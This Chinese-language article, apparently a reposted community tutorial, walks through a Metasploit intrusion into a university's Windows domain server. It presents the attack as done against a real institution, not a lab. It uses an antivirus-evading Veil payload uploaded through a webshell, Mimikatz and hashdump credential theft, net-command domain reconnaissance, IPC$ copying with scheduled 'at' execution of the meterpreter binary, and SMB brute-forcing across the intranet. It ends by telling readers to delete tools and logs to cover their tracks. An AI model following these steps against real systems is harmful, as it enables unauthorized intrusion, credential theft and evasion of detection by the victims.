Metasploit渗透某高校域服务器
?
本文作者:i 春秋簽約作家——shuteer
?前期準備:1. 使用Veil生成免殺PAYLOAD; 2. 有一個外網IP的服務器,安裝好metasploit,方便操作。
一.SHELL反彈meterpreter
上傳免殺的PAYLOAD到SHELL(有時候會碰到EXE文件上傳不了,可以使用powershell的meterpreter模塊“XX.bat格式”來實現),然后在菜刀或者WEBSHELL下面運行,反彈成功。
二.提權
反彈成功后第一步就是getuid看權限,然后嘗試提權,有以下幾種方法
1.利用漏洞模塊提權,如ms15_05之類
2.令牌假冒
3.繞過Windows賬戶控制,比如Bypassuac提權
4.HASH攻擊
如果服務器沒有提權成功也不要緊,可以以此服務器為跳板,攻擊內網其它服務器
好吧,我是system權限,就不用提權了,直接抓HASH吧!
1.使用WCE和MIMIKATZ(這2個工具必須要管理員的權限,而且注意工具的免殺)
2.使用MSF的hashdump模塊,一個是hashdump,只能導出本地hash,另一個是smart_hashdump(必須是管理員權限),可以導出域用戶的hash
3.使用Powershell模塊直接導出
三.信息收集
1.ipconfig /all
http://2.net view /domain 查看有幾個域
http://3.net view /domain:XXX 查看此域內電腦
http://4.net group /domain 查詢域里面的組
http://5.net group “domain admins” /domain 查看域管理員
http://6.net group “domain controllers” /domain 查看域控制器
http://7.net group “enterprise admins” /domain 查看企業管理組
其他還有很多,網上可以一搜一大把,大家可以都試試
此時我們大概清楚了該內網的大概拓撲,知道域服務器是10.48.128.20
四.分析下一步攻擊方向
分析下此時情況,我們已經獲取了一個服務器的密碼。我們第一目標當然是域服務器,此時有二種情況,當前服務器可以連接域服務器和不可以連接域服務器
A.如果不能直接攻擊域服務器,我們需要再攻擊內網某個服務器,然后再攻擊域服務器
1.我們可以利用抓到的密碼加上我們收集的信息編個字典,然后添加路由進行弱口令的掃描
2.使用p**ec爆破整個局域網或者反彈meterpreter
3.利用smb_login模塊掃描內網
4.利用當前權限,用WIN下面的P**ec進行內網滲透
5.使用powershell對內網進行掃描(要求WIN7以上服務器)
6.架設socks4a,然后進行內網掃描
7.利用當前權限,進行內網IPC$滲透
B.可以直接攻擊域服務器
五. 攻擊域服務器
我們這次是可以直接攻擊域服務器的,所以我們用最簡單的方法IPC$滲透先試試
失敗了
我們再用WIN下面的P**ec試試
又失敗了,不應該啊,我們再仔細分析下,加上域名試試。
看,成功了,我們net use可以看到已經成功連接上了
Net use \\ip\c$
Copy sd.exe \\ip\c$ (其中sd.exe是VEIL生成的meterpreter)
Net time \\ip
At \\ip time c:\sd.exe
具體看截圖
然后exit到meterpreter,設置meterpreter>background,
設置監聽,等待反彈
可以看到,已經反彈成功了,我們看下IP地址是不是域服務器的
我們已經成功的獲取了域服務器的meterpreter,看下權限getuid
好吧,我們是system權限,就不用提權了,為了使meterpreter shell更穩定和更隱蔽,先把meterpreter shell程序進程遷移到EXPLORE進程
PS 獲取一系列的運行進程,使用migrate PID ,然后KILL掉原來的進程
我們接下來抓HASH,可以用Mimikatz也可以用run post/windows/gather/hashdump
PS:我們在用Mimikatz抓HASH之前要注意一點,如果服務器是安裝的64位操作系統,要把Mimikatz進程遷移到一個64位的程序進程中,才能查看64位系統密碼明文。32位系統沒有這個限制,都可以查看系統密碼.
這里為了方便,我們使用hashdump來抓hash,run post/windows/gather/hashdump
失敗了,權限不夠,我們看下自己的權限,因為剛才遷移PAYLOAD進程時候,EXPLOR是administrator權限,我們getsystem,再抓,見圖,成功了
六.SMB快速擴張控制權限
參照第4步,這里我們使用p**ec爆破內網或者利用smb_login模塊爆破內網
1.msf 添加路由 route add ip mask sessionid
2.smb_login模塊或者p**ec_scanner模塊
查看爆破成功的機器 creds
最后我們看一下session控制圖
七.擦PP
所有操作完成后,一定要記得清理下痕跡
1.刪除所有使用的工具
2.刪除所有操作記錄
3.關閉所有的meterpreter
《Metasploit——后門篇》返回到 i春秋社區 < < < < 查看哦,謝謝!
總結
以上是生活随笔為你收集整理的Metasploit渗透某高校域服务器的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Oracle 10g数据库基础之基本查询
- 下一篇: 第五六单元练习题